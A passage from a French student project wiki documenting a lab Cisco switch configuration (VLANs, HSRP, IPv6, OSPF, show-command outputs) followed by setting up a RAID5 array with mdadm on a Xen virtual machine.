 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
